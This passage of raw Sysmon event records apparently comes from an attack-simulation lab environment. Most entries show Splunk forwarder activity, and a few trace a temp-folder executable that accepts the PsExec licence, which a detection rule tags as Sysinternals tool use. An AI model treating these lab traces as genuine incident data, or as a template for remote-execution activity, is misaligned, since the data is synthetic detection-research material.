Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000296958Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:01.198{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8628487791C898CAD3629FC15146B52,SHA256=8E8E7DF265414B327B46E8D9B81309ADC01D6731693304A680DBCE5E5F2B5AF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220935Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:02.500{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9B634CE8CF0C90E1010B989C2321529,SHA256=D0D4FCA954CF4D7BD3D0C8A7BC00BE43F858E0FF9C573A98490A48FD4E62C240,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296994Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:02.945{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=F36DAE87287D6DFA19A02E4DE6C08BF0,SHA256=4B25E8B7BF9EF3B4B81B59ACF75D60F00BE109F77326D48B3C9F05600C86C6D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296993Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:02.945{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=6AC68925D2FCF1582F9A17EC03EB793C,SHA256=C6077E3DFB157403F2CA916B78F69CD281A93347CA6C17B3D6A7C6A6F01DCE86,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296992Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:02.560{C8EA50B7-16FA-6216-1507-000000003802}67525812C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296991Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:02.382{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6099A0B28EFAE36B660F1F4B67036ADB,SHA256=09591FACA9FA818377D2D71F92BFEAD09C5F1E1124FCB4D6D713BA63272AB36D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296990Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:02.376{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296989Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:02.376{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296988Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:02.375{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296987Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:02.375{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296986Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:02.313{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-16F9-6216-1307-000000003802}2052C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296985Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:02.313{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-16F9-6216-1307-000000003802}2052C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000296984Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:14:02.280{C8EA50B7-16F9-6216-1307-000000003802}2052C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000296983Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:02.244{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-16FA-6216-1507-000000003802}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296982Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:02.244{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-16FA-6216-1507-000000003802}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296981Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:02.244{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-16FA-6216-1507-000000003802}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296980Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:02.246{C8EA50B7-16FA-6216-1507-000000003802}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000296979Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:02.181{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-16FA-6216-1407-000000003802}6384C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296978Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:02.181{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-16FA-6216-1407-000000003802}6384C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296977Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:02.129{C8EA50B7-16FA-6216-1407-000000003802}63846596C:\Windows\system32\conhost.exe{C8EA50B7-16F9-6216-1307-000000003802}2052C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296976Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:02.079{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-16FA-6216-1407-000000003802}6384C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296975Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:02.060{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-16FA-6216-1407-000000003802}6384C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000220936Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:03.734{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7BD39621B1B9A58FF19D9E291A9454B,SHA256=05898B05395973343405E8DF47C034DC2EE93625A56DB82927537627E5F933BA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297004Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:03.918{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-16FB-6216-1607-000000003802}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297003Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:03.901{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297002Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:03.901{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297001Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:03.901{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-16FB-6216-1607-000000003802}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297000Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:03.901{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296999Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:03.901{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296998Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:03.901{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-16FB-6216-1607-000000003802}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296997Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:03.906{C8EA50B7-16FB-6216-1607-000000003802}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000296996Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:03.415{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3206C2C79E0829BF150CF17F5881274B,SHA256=B3D40E60102737A73D2D0ACCB875DE0E7CACFFC078E68238F2F4A79C87E72379,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296995Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:00.574{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49406-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000220938Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:04.968{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 